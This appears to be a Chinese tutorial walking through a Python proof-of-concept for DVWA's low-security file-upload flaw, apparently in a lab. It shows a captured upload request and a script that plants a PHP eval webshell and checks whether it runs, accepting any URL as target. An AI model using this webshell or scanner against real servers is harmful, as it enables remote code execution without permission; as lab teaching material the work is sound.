首先,构造POC我们首先要明白漏洞利用的流程,然后要知道请求包的格式,然后才能针对性的POC
这里先选择低难度的文件上传,低难度的是没有任何过滤可以直接上传的,先上传一个php一句话木马,使用burpsuite抓包
POST /dv/vulnerabilities/upload/ HTTP/1.1Host: 10.9.75.161Content-Length: 435Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://10.9.75.161Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuxrXFxFcx9P3yQDYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://10.9.75.161/dv/vulnerabilities/upload/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3Connection: close------WebKitFormBoundaryuxrXFxFcx9P3yQDYContent-Disposition: form-data; name="MAX_FILE_SIZE"100000------WebKitFormBoundaryuxrXFxFcx9P3yQDYContent-Disposition: form-data; name="uploaded"; filename="1.php"Content-Type: application/x-php<?php eval($_REQUEST[777]);phpinfo();?>------WebKitFormBoundaryuxrXFxFcx9P3yQDYContent-Disposition: form-data; name="Upload"Upload------WebKitFormBoundaryuxrXFxFcx9P3yQDY--这里我直接复制下来是不能用的
这里需要将内容变成这种格式的请求头,这里可以用笨方法一个一个改,但是这里是可以通过python的正则表达式来提高我们的效率的
"Content-Length":"435",这里按照下面的步骤,如果要求不同选择其他正则表达式即可
效果如下
然后在外面套上headers
在头部信息里其实只要UA信息就可以了,cookie和accept可以要也可以不要,可以自己慢慢修改
headers={
"User-Agent":" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
"Accept":" text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Cookie":" security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3",
}再来看请求头的data部分
------WebKitFormBoundaryuxrXFxFcx9P3yQDYContent-Disposition: form-data; name="MAX_FILE_SIZE"100000------WebKitFormBoundaryuxrXFxFcx9P3yQDYContent-Disposition: form-data; name="uploaded"; filename="1.php"Content-Type: application/x-php<?php eval($_REQUEST[777]);phpinfo();?>------WebKitFormBoundaryuxrXFxFcx9P3yQDYContent-Disposition: form-data; name="Upload"Upload------WebKitFormBoundaryuxrXFxFcx9P3yQDY--构造files部分
files={
"MAX_FILE_SIZE":(None,100000),
"uploaded":("1.php","<?php eval($_REQUEST[777]);phpinfo();?>"),
"Upload":(None,"Upload")
}数据包是POST方式,所以脚本也要POST方式
POST /dv/vulnerabilities/upload/ HTTP/1.1 res=requests.post(url+path, headers=headers, files=files)print(res.text)中间报了一个错误,再用正则表达式修改一下
下面附上最终POC
import requestsdef upload(url):path = '/dv/vulnerabilities/upload/' # 上传入口headers={
"Host":" 10.9.75.161".strip(),
"Content-Length":" 435".strip(),
"Cache-Control":" max-age=0".strip(),
"Upgrade-Insecure-Requests":" 1".strip(),
"Origin":" http://10.9.75.161".strip(),
"Content-Type":" multipart/form-data; boundary=----WebKitFormBoundaryuxrXFxFcx9P3yQDY".strip(),
"User-Agent":" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36".strip(),
"Accept":" text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9".strip(),
"Referer":" http://10.9.75.161/dv/vulnerabilities/upload/".strip(),
"Accept-Encoding":" gzip, deflate".strip(),
"Accept-Language":" en-US,en;q=0.9".strip(),
"Cookie":" security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3".strip(),}files={"MAX_FILE_SIZE":(None,100000),"uploaded":("1.php","<?php eval($_REQUEST[777]);phpinfo();?>"),"Upload":(None,"Upload")}res=requests.post(url+path, headers=headers, files=files)print(res.text)poc_path = "/dv/hackable/uploads/1.php"resp=requests.post(url+poc_path)if "PHP Version" in resp.text:print("[+]",url,"存在文件上传漏洞")else:print("[-]",url,"未发现存在文件上传漏洞")if __name__ == '__main__':url=input('输入需要检测的url:')upload("http://"+url)运行结果
![[学习笔记]DeepWalk图神经网络论文精读](https://img-blog.csdnimg.cn/95ff673399934b85b341c704794d8e45.png)
